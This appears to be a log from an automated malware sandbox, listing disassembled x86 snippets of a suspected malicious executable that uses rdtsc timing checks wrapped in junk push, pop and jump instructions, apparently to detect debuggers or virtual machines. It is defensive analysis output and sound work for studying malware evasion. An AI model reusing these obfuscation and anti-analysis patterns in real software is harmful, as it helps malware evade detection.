Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68A39 second address: D68A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FF724EF309Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68A64 second address: D68A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68D84 second address: D68DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF724EF30A3h 0x0000000a jmp 00007FF724EF309Dh 0x0000000f popad 0x00000010 js 00007FF724EF30C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68DA6 second address: D68DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68DB0 second address: D68DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6BD43 second address: D6BD47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6BFF6 second address: D6C000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF724EF3096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C000 second address: D6C01C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF724E9654Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C01C second address: D6C022 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C022 second address: D6C027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C0B6 second address: D6C0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C0BC second address: D6C133 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF724E96546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jnp 00007FF724E96548h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FF724E96548h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 or dx, BB13h 0x00000037 push 00000004h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FF724E96548h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 mov dx, 7920h 0x00000057 push 8F88B99Bh 0x0000005c push eax 0x0000005d push edx 0x0000005e push esi 0x0000005f jmp 00007FF724E9654Bh 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C133 second address: D6C142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF724EF309Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6C2FE second address: D6C303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6F2CB second address: D6F2CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6F2CF second address: D6F2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF724E96554h 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007FF724E96546h 0x00000010 popad 0x00000011 pushad 0x00000012 jns 00007FF724E96546h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6EE79 second address: D6EE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6EE7D second address: D6EE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jnl 00007FF724E96546h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410DA1 second address: 5410E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF724EF309Eh 0x0000000f push eax 0x00000010 jmp 00007FF724EF309Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF724EF30A6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF724EF309Eh 0x00000024 adc ax, ED98h 0x00000029 jmp 00007FF724EF309Bh 0x0000002e popfd 0x0000002f mov cx, E74Fh 0x00000033 popad 0x00000034 pop ebp 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410E1E second address: 5410E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400CE1 second address: 5400CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400CE8 second address: 5400D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF724E96557h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400D11 second address: 5400D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF724EF309Fh 0x00000009 adc cx, E92Eh 0x0000000e jmp 00007FF724EF30A9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF724EF30A0h 0x0000001a sub ah, FFFFFFA8h 0x0000001d jmp 00007FF724EF309Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF724EF30A0h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400D7B second address: 5400D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E00EE second address: 53E00F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E00F2 second address: 53E00F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E00F6 second address: 53E00FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E00FC second address: 53E012C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF724E96550h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E012C second address: 53E0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0130 second address: 53E0134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0134 second address: 53E013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E013A second address: 53E0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0140 second address: 53E0167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF724EF309Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E0167 second address: 53E01B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF724E96553h 0x00000014 xor ch, 0000004Eh 0x00000017 jmp 00007FF724E96559h 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53E01B5 second address: 53E01FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF724EF309Dh 0x00000009 add cl, FFFFFF86h 0x0000000c jmp 00007FF724EF30A1h 0x00000011 popfd 0x00000012 push ecx 0x00000013 pop edi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF724EF30A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400A36 second address: 5400AA6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF724E96556h 0x00000008 and si, C258h 0x0000000d jmp 00007FF724E9654Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 popad 0x0000001a mov dword ptr [esp], ebp 0x0000001d jmp 00007FF724E96550h 0x00000022 mov ebp, esp 0x00000024 jmp 00007FF724E96550h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF724E96557h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400AA6 second address: 5400AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400AAC second address: 5400AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005EC second address: 54005F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005F0 second address: 54005F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005F4 second address: 54005FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005FA second address: 5400642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 pushfd 0x00000006 jmp 00007FF724E96554h 0x0000000b jmp 00007FF724E96555h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov al, BEh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF724E9654Fh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400642 second address: 5400671 instructions: 0x00000000 rdtsc 0x00000002 mov si, 0B5Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FF724EF30A5h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF724EF309Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400517 second address: 540051D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 540051D second address: 5400566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 39786EE3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 pushfd 0x00000011 jmp 00007FF724EF309Dh 0x00000016 add esi, 6040E1E6h 0x0000001c jmp 00007FF724EF30A1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esp], ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF724EF309Dh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400566 second address: 540058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF724E9654Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 540058C second address: 5400592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400592 second address: 54005A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005A1 second address: 54005A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54005A7 second address: 54005C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF724E96556h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54002D2 second address: 540032F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF724EF30A7h 0x00000009 sbb ecx, 3240C66Eh 0x0000000f jmp 00007FF724EF30A9h 0x00000014 popfd 0x00000015 jmp 00007FF724EF30A0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f mov dh, B4h 0x00000021 mov edx, esi 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov esi, edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 540032F second address: 5400334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400334 second address: 540033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410126 second address: 5410172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov edi, 6D0CECCEh 0x00000011 pop ebx 0x00000012 pushfd 0x00000013 jmp 00007FF724E96554h 0x00000018 add ax, 6618h 0x0000001d jmp 00007FF724E9654Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410172 second address: 5410176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410176 second address: 541017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 541017C second address: 5410183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 3Ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440951 second address: 54409A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, DC32h 0x0000000f push edx 0x00000010 mov bx, ax 0x00000013 pop eax 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF724E96551h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov bx, si 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF724E96556h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5420134 second address: 5420171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FF724EF30A2h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ebx, ecx 0x00000016 call 00007FF724EF30A8h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5420171 second address: 5420177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5420177 second address: 5420197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF724EF30A5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5420197 second address: 542019D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 542019D second address: 54201BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF724EF30A2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54201BB second address: 54201D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, 6EF1h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5400475 second address: 54004B0 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 755B79E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF724EF309Eh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 jmp 00007FF724EF30A0h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF724EF309Ah 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54004B0 second address: 54004BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410D2F second address: 5410D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410D33 second address: 5410D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410FA7 second address: 5410FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410FAB second address: 5410FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5410FAF second address: 5410FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440008 second address: 544000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544000C second address: 5440012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5440012 second address: 54400D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF724E96558h 0x00000009 sub cl, 00000048h 0x0000000c jmp 00007FF724E9654Bh 0x00000011 popfd 0x00000012 mov ax, 00BFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF724E96550h 0x00000021 jmp 00007FF724E96555h 0x00000026 popfd 0x00000027 mov dx, ax 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007FF724E9654Dh 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 pushfd 0x00000036 jmp 00007FF724E96558h 0x0000003b sub eax, 0BAD8868h 0x00000041 jmp 00007FF724E9654Bh 0x00000046 popfd 0x00000047 popad 0x00000048 mov ebp, esp 0x0000004a pushad 0x0000004b mov si, D17Bh 0x0000004f mov esi, 4F8E0A57h 0x00000054 popad 0x00000055 xchg eax, ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FF724E96559h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54400D8 second address: 544019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 32C2h 0x00000007 mov dh, B9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF724EF309Bh 0x00000014 adc al, FFFFFFBEh 0x00000017 jmp 00007FF724EF30A9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007FF724EF30A0h 0x00000023 or al, FFFFFFB8h 0x00000026 jmp 00007FF724EF309Bh 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, ecx 0x0000002e jmp 00007FF724EF30A6h 0x00000033 mov eax, dword ptr [775165FCh] 0x00000038 jmp 00007FF724EF30A0h 0x0000003d test eax, eax 0x0000003f pushad 0x00000040 push esi 0x00000041 push edi 0x00000042 pop esi 0x00000043 pop ebx 0x00000044 pushfd 0x00000045 jmp 00007FF724EF30A6h 0x0000004a jmp 00007FF724EF30A5h 0x0000004f popfd 0x00000050 popad 0x00000051 je 00007FF796F4686Bh 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 544019D second address: 54401A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54401A1 second address: 54401A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54401A7 second address: 54401AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
